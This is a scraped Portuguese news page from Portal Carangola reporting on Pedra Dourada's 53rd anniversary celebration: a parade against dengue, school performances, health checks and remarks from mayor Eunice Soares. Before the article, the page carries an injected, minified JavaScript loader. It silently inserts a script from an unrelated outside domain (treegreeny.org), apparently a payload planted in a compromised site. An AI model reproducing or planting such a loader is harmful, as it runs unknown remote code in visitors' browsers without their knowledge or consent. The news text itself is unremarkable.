;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Pedra Dourada comemora 53 anos com cultura e civismo. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Pedra Dourada comemora 53 anos com cultura e civismo.

A comemoração pelos 53 anos de emancipação política de Pedra Dourada aconteceu na manhã desta terça-feira (01/03) com uma passeata, que partiu da igreja Matriz de São José com destino a Escola Municipal Manoel Quintão, onde aconteceram apresentações culturais, aferição de pressão arterial e glicose. O tema escolhido para a passeata foi o combate ao mosquito da dengue, integrando a cidade mais uma vez na campanha “10 Minutos Contra a Dengue”.
O objetivo da festividade foi integrar conscientização, civismo e comemorar os 53 anos de emancipação política de Pedra Dourada. Uma cidade jovem, mas, consolidada como um dos marcos do turismo na região, e pela alta qualidade de vida dos moradores. A opção pelas solenidades foi pensando não apenas em economizar e conter gastos, mas também na educação das crianças de Pedra Dourada.
“Não podia passar em branco uma data como esta. Como estamos sempre contendo gastos, resolvemos fazer uma festa mais modesta, mas não podia deixar de ter a participação da escola, porque estes alunos, essas crianças e adolescentes, são o futuro da cidade, e pudemos contar com todas as secretarias, que participaram ativamente na organização do evento. Este momento cívico é importante para que as crianças aprendam, desde cedo, a tratar a cidade de forma respeitosa, fazendo com que cresçam de todas as formas. A festa é saudável e com atrações saudáveis, e isso mostra que as crianças podem ter um lazer, ter tudo e com outra qualidade.” Explicou a prefeita Eunice Soares.
Os alunos das oficinas de dança e música do Cras fizeram apresentações impecáveis para os presentes. As oficinas são oferecidas gratuitamente para os jovens da cidade durante todo o ano.
Os alunos e visitantes que acompanharam as solenidades cívicas e apresentações puderam desfrutar de um variado café da manhã oferecido pela prefeitura municipal.

Prefeitura Municipal

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.